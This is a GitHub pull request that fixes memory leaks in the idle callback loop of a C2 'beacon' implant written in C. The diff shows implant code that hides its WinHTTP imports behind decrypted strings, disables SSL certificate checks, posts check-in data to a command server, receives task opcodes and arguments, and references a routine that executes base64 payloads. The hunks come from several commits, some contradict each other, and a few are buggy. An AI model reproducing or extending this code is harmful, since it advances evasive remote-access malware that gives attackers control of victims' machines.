### PR TITLE
Issue 33 beacon idle memory leak

### DIFF
--- a/beacon/src/beacon.c
+++ b/beacon/src/beacon.c
@@ -114,6 +114,8 @@ void main()
             return;
         }
 
+        free(Buffer);
+
         if (!Success)
         {
             ReportExecutionFail();

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -415,15 +415,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     WinHttpReadData_ rWinHttpReadData = (WinHttpReadData_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
     free(tmp_decrypted_str);
 
-    // check if we doing a normal checkin or sending data
-
-    if (SendBuffer == NULL && SendOpCode == NULL)
-    {
-        UriBuffer = (LPCSTR*)malloc(5000);
-    } else {
-        UriBuffer = (LPCSTR*)malloc(SendBufferSize * 2);
-    }
-
     hSession = rWinHttpOpen((LPCWSTR)UserAgent, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
 
     if (!hSession)
@@ -469,8 +460,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 
     // build the data for the request
 
-    memset(UriBuffer, '\0', strlen(UriBuffer));
-
     if (SendOpCode != NULL)
     {
         UriBuffer = BuildCheckinData(SendOpCode, SendBuffer, MODE_CHECKIN_DATA);
@@ -481,6 +470,7 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     // finally send the actual request to the c2
 
     bResults = rWinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)UriBuffer, strlen((char*)UriBuffer), strlen((char*)UriBuffer), 0);
+    free(UriBuffer);
 
     // make sure the request was successful
 

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -533,12 +533,8 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
             }
             else
             {
-                tmp = &ResBuffer;
+                // TODO: test if this is leaking memory.
                 asprintf(&ResBuffer, "%s%s", ResBuffer, pszOutBuffer);
-                // If ResBuffer was reallocated to fit pszOutBuffer free the previous chunk saved in tmp
-                if (tmp != &ResBuffer) {
-                    free(tmp);
-                }
             }
 
             // free the memory allocated to the buffer.
@@ -562,8 +558,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     }
     // Free ResBuffer json object
     json_object_put(parsed_json);
-    // Free ResBuffer
-    free(ResBuffer);
     // Cleanup handles
     rWinHttpCloseHandle(hRequest);
     rWinHttpCloseHandle(hSession);

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -360,8 +360,60 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     HINTERNET           hSession = NULL, hConnect = NULL, hRequest = NULL;
     LPCSTR*             UriBuffer;
     DWORD               flags;
+    char*               tmp_decrypted_str;
 
     struct json_object *parsed_json;
+
+    // create all references to dll functions
+    // Load WinHTTP.dll
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY);
+    hWinHTTPdll = LoadLibrary(tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpCloseHandle reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_CLOSEH, STRING_WINHTTP_CLOSEH_KEY);
+    WinHttpCloseHandle_ rWinHttpCloseHandle = (WinHttpCloseHandle_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpOpen reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_OPEN, STRING_WINHTTP_OPEN_KEY);
+    WinHttpOpen_ rWinHttpOpen = (WinHttpOpen_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpConnect reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_CONNECT, STRING_WINHTTP_CONNECT_KEY);
+    WinHttpConnect_ rWinHttpConnect = (WinHttpConnect_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpOpenRequest reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_OPENREQ, STRING_WINHTTP_OPENREQ_KEY);
+    WinHttpOpenRequest_ rWinHttpOpenRequest = (WinHttpOpenRequest_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpSetOption reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_SETOPT, STRING_WINHTTP_SETOPT_KEY);
+    WinHttpSetOption_ rWinHttpSetOption = (WinHttpSetOption_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpSendRequest reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_SENDREQ, STRING_WINHTTP_SENDREQ_KEY);
+    WinHttpSendRequest_ rWinHttpSendRequest = (WinHttpSendRequest_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpReceiveResponse reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_RECVRES, STRING_WINHTTP_RECVRES_KEY);
+    WinHttpReceiveResponse_ rWinHttpReceiveResponse = (WinHttpReceiveResponse_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpQueryDataAvailable reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_DATAAVA, STRING_WINHTTP_DATAAVA_KEY);
+    WinHttpQueryDataAvailable_ rWinHttpQueryDataAvailable = (WinHttpQueryDataAvailable_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
+
+    // Create WinHttpReadData reference
+    tmp_decrypted_str = decrypt_string(STRING_WINHTTP_READATA, STRING_WINHTTP_READATA_KEY);
+    WinHttpReadData_ rWinHttpReadData = (WinHttpReadData_)GetProcAddress(hWinHTTPdll, tmp_decrypted_str);
+    free(tmp_decrypted_str);
 
     // check if we doing a normal checkin or sending data
 
@@ -372,13 +424,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
         UriBuffer = (LPCSTR*)malloc(SendBufferSize * 2);
     }
 
-    // get the close handle export
-    WinHttpCloseHandle_ rWinHttpCloseHandle = (WinHttpCloseHandle_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                              decrypt_string(STRING_WINHTTP_CLOSEH, STRING_WINHTTP_CLOSEH_KEY));
-
-    // initiate the session
-    WinHttpOpen_ rWinHttpOpen = (WinHttpOpen_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                         decrypt_string(STRING_WINHTTP_OPEN, STRING_WINHTTP_OPEN_KEY));
     hSession = rWinHttpOpen((LPCWSTR)UserAgent, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
 
     if (!hSession)
@@ -388,9 +433,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     }
 
     // do the connection
-    WinHttpConnect_ rWinHttpConnect = (WinHttpConnect_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                  decrypt_string(STRING_WINHTTP_CONNECT, STRING_WINHTTP_CONNECT_KEY));
-
     hConnect = rWinHttpConnect(hSession, (LPCWSTR)CallbackAddress, CallbackPort, 0);
 
     if (!hConnect)
@@ -401,8 +443,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     }
 
     // set up the request
-    WinHttpOpenRequest_ rWinHttpOpenRequest = (WinHttpOpenRequest_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                              decrypt_string(STRING_WINHTTP_OPENREQ, STRING_WINHTTP_OPENREQ_KEY));
 
     hRequest = rWinHttpOpenRequest(hConnect, L"POST", _CALLBACK_URL, NULL, NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE | WINHTTP_FLAG_SECURE);
 
@@ -417,9 +457,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     // set the flags for our request, basically so we can connect when the c2 ssl cert is fucked
 
     flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;
-
-    WinHttpSetOption_ rWinHttpSetOption = (WinHttpSetOption_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                        decrypt_string(STRING_WINHTTP_SETOPT, STRING_WINHTTP_SETOPT_KEY));
 
     if (!rWinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &flags, sizeof(flags)))
     {
@@ -442,8 +479,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     }
 
     // finally send the actual request to the c2
-    WinHttpSendRequest_ rWinHttpSendRequest = (WinHttpSendRequest_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                              decrypt_string(STRING_WINHTTP_SENDREQ, STRING_WINHTTP_SENDREQ_KEY));
 
     bResults = rWinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)UriBuffer, strlen((char*)UriBuffer), strlen((char*)UriBuffer), 0);
 
@@ -451,9 +486,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 
     if (bResults)
     {
-        WinHttpReceiveResponse_ rWinHttpReceiveResponse = (WinHttpReceiveResponse_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                                              decrypt_string(STRING_WINHTTP_RECVRES, STRING_WINHTTP_RECVRES_KEY));
-
         bResults = rWinHttpReceiveResponse(hRequest, NULL);
     }
 
@@ -471,8 +503,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
             // check how much available data there is
 
             dwSize = 0;
-            WinHttpQueryDataAvailable_ rWinHttpQueryDataAvailable = (WinHttpQueryDataAvailable_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                                                           decrypt_string(STRING_WINHTTP_DATAAVA, STRING_WINHTTP_DATAAVA_KEY));
 
             if (!rWinHttpQueryDataAvailable( hRequest, &dwSize))
             {
@@ -500,9 +530,6 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
             // read all the data
 
             ZeroMemory(pszOutBuffer, dwSize + 1);
-
-            WinHttpReadData_ rWinHttpReadData = (WinHttpReadData_)GetProcAddress(LoadLibrary(decrypt_string(STRING_WINHTTP_DLL, STRING_WINHTTP_DLL_KEY)),
-                                                                                             decrypt_string(STRING_WINHTTP_READATA, STRING_WINHTTP_READATA_KEY));
 
             if (!rWinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
             {

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -563,6 +563,10 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     json_object_put(parsed_json);
     // Free ResBuffer
     free(ResBuffer);
+    // Cleanup handles
+    rWinHttpCloseHandle(hRequest);
+    rWinHttpCloseHandle(hSession);
+    rWinHttpCloseHandle(hConnect);
     return argsBuffer;
 }
 

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -313,7 +313,7 @@ LPCSTR* BuildCheckinData(DWORD OpCode, LPCSTR Data, DWORD Mode)
     /*
     Build the reply to the C2 containing any data we need to send back
     */
-
+    LPCSTR *beaconCheckinData;
     struct json_object *jobj;
 
     // init the json object
@@ -343,7 +343,9 @@ LPCSTR* BuildCheckinData(DWORD OpCode, LPCSTR Data, DWORD Mode)
     }
 
     // return the formated data
-    return (LPCSTR*)json_object_to_json_string_ext(jobj, JSON_C_TO_STRING_PLAIN);
+    beaconCheckinData = (LPCSTR *) _strdup(json_object_to_json_string_ext(jobj, JSON_C_TO_STRING_PLAIN));
+    json_object_put(jobj);
+    return beaconCheckinData;
 }
 
 LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserAgent, DWORD *OpCode, LPCSTR SendBuffer, DWORD SendOpCode, DWORD SendBufferSize)

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -301,6 +301,10 @@ BOOL BeaconRegisterC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserAgent
     parsed_json = json_object_object_get(parsed_json, "id");
     strcpy(IdBuffer, json_object_get_string(parsed_json));
 
+    // Decrement json object reference count
+    json_object_put(parsed_json);
+    // Free WinHTTP.dll
+    FreeLibrary(hWinHTTPdll);
     return TRUE;
 }
 

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -486,6 +486,7 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
         LPSTR pszOutBuffer;
 
         ResBuffer = "";
+        char* tmp;
 
         do
         {
@@ -528,7 +529,12 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
             }
             else
             {
+                tmp = &ResBuffer;
                 asprintf(&ResBuffer, "%s%s", ResBuffer, pszOutBuffer);
+                // If ResBuffer was reallocated to fit pszOutBuffer free the previous chunk saved in tmp
+                if (tmp != &ResBuffer) {
+                    free(tmp);
+                }
             }
 
             // free the memory allocated to the buffer.

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -363,6 +363,9 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     char*               tmp_decrypted_str;
 
     struct json_object *parsed_json;
+    struct json_object *parsed_json_task;
+    struct json_object *parsed_json_args;
+
 
     // create all references to dll functions
     // Load WinHTTP.dll
@@ -546,17 +549,21 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
 
     // get the opcode
     parsed_json = json_tokener_parse(ResBuffer);
-    parsed_json = json_object_object_get(parsed_json, "task");
-    *OpCode     = json_object_get_int(parsed_json);
+    parsed_json_task = json_object_object_get(parsed_json, "task");
+    *OpCode     = json_object_get_int(parsed_json_task);
 
-    parsed_json = json_tokener_parse(ResBuffer);
-    parsed_json = json_object_object_get(parsed_json, "args");
+    parsed_json_args = json_object_object_get(parsed_json, "args");
+    LPCSTR *argsBuffer = NULL
     if (parsed_json != NULL)
     {
-        return json_object_get_string(parsed_json);
+        // Copy args json string into return buffer
+        argsBuffer = (LPCSTR *) _strdup(json_object_get_string(parsed_json_args));
     }
-
-    return NULL;
+    // Free ResBuffer json object
+    json_object_put(parsed_json);
+    // Free ResBuffer
+    free(ResBuffer);
+    return argsBuffer;
 }
 
 BOOL SpawnExecuteCode(char* Base64Buffer)

--- a/beacon/src/core.c
+++ b/beacon/src/core.c
@@ -360,6 +360,7 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     HINTERNET           hSession = NULL, hConnect = NULL, hRequest = NULL;
     LPCSTR*             UriBuffer;
     DWORD               flags;
+    HMODULE             hWinHTTPdll;
     char*               tmp_decrypted_str;
 
     struct json_object *parsed_json;
@@ -553,7 +554,7 @@ LPCWSTR* BeaconCallbackC2(LPCSTR CallbackAddress, INT CallbackPort, LPCSTR UserA
     *OpCode     = json_object_get_int(parsed_json_task);
 
     parsed_json_args = json_object_object_get(parsed_json, "args");
-    LPCSTR *argsBuffer = NULL
+    LPCSTR *argsBuffer = NULL;
     if (parsed_json != NULL)
     {
         // Copy args json string into return buffer

--- a/beacon/src/crypt.c
+++ b/beacon/src/crypt.c
@@ -7,7 +7,7 @@ char* decrypt_string(char* string, int key)
 
     size_t out_len   = strlen(string) + 1;
     size_t b64_len   = b64_decoded_size(string);
-    char*  b64_out   = (char*)malloc(out_len);
+    char*  b64_out;
 
     b64_out = base64_decode((const char*)string, out_len - 1, &out_len);
 

--- a/beacon/src/debug.c
+++ b/beacon/src/debug.c
@@ -15,4 +15,6 @@ void DEBUG(const char* text, ...)
     #ifdef DEBUG_MODE
         printf("[DEBUG] %s\n", string);
     #endif
+
+    free(string);
 }


### PR DESCRIPTION
This PR fixes most (I think) of the memory leaks present in the stageless beacons idle code path. The following screenshots show the memory usage over a 10 minute idle test. The memory usage in process explorer started out at ~5.9MB. There still seems to be some type of leak but my suspicion is that it occurs because a new http session is created every callback loop, that is the only place I can think of where a leak would still exist: See [this stackoverflow post](https://stackoverflow.com/questions/12652868/winhttpopen-leaking-memory). That being said I could have missed something.

I wanted to keep this PR as specific to the idle loop as possible so the fixes could be digested and discussed. I don't want to introduce bugs into the code base in a huge PR. I also choose not to squash my commits so each individual change can be inspected for correctness. **There are still memory leaks in other parts of the beacon code!**

NOTE: The jump in the perfmon test happened when windows defender started a scan :(

Relates to #34 

**Perfmon 10 minute idle test**
![memleak_fix_perfmon](https://user-images.githubusercontent.com/15173997/92849277-bbdf7900-f3b0-11ea-9b92-a651b8c13d06.png)

**Process Explorer Performance graph for 10 minute idle test**
![memleak_fix_process_explorer](https://user-images.githubusercontent.com/15173997/92849281-bda93c80-f3b0-11ea-8ffc-0d28bfd53c03.png)
